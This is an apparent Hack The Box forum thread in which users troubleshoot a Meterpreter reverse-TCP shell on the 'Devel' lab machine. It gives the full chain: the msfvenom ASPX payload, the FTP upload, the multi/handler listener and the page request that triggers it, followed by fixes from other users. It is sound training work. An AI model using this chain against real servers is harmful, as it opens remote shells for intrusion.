Cannot trigger reverse tcp payload on Devel

I’ve done the following:
create the payload -
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(MY IP) LPORT=(MY PORT) -f aspx -o devel.aspx

upload the payload-
ftp 10.10.10.5
PUT devel.aspx

start a listener-
msf > use multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST
LHOST =>
msf exploit(multi/handler) > set LPORT
LPORT =>
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on MYIP:MYPORT

trigger the payload-
http://10.10.10.5/devel.aspx

nothing… the payload was never triggered and I dont understand where i went wrong.

I am facing the same challenge too. Where able to work around it?
If yes, share your findings please

I too am facing same problem…any update on this?

Check your IP within the HTB server. if you use ifconfig it should be the inet under tun0

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet XX.XX.XX.XX  netmask 255.255.254.0  destination XX.XX.XX.XX

I am facing the same issue as your. These are the exact steps I took and same behaviour.
I have followed these approaches so far:

  • Recreated the payload
  • Uploaded the payload
  • Restarted msf and the whole process
  • Restarted Kali then the whole process from scratch
  • Reconnected openvpn
  • Make sure that all the time I have connectivity
  • Make sure that I have access to ftp/IIS server

Nothing looks work.

The only thing I noticed was that if I use “run”, I get this same issue. If I use “exploit” (or “exploit -j”) it does not even start the reverse TCP handler part.

Refresh the website 10.10.10.5/devel.aspx

That should kick start the session.

Confirm: Return to your terminal with your meterperter session. Otherwise, start the entire exploit over, end sessions and go step by step. Annoying, but necessary.

Good luck!

@JoyHuggs I’ve done exactly that, restart everything again but it keeos not working, what is odd is that I had a meterpreter session then it died and when I tried to restart the shell with a listener and refreshing the payloaf nothing happened from that moment onwards. On the other hand with a simple webshell everything works but for the training I’m trying to do I need the access to a meterpreter shell.

I ran into the same symptoms, for me the issue was that I hadn’t set the payload in the handler. It looks like the original poster has done that, but for anyone else who may end up here that might be worth checking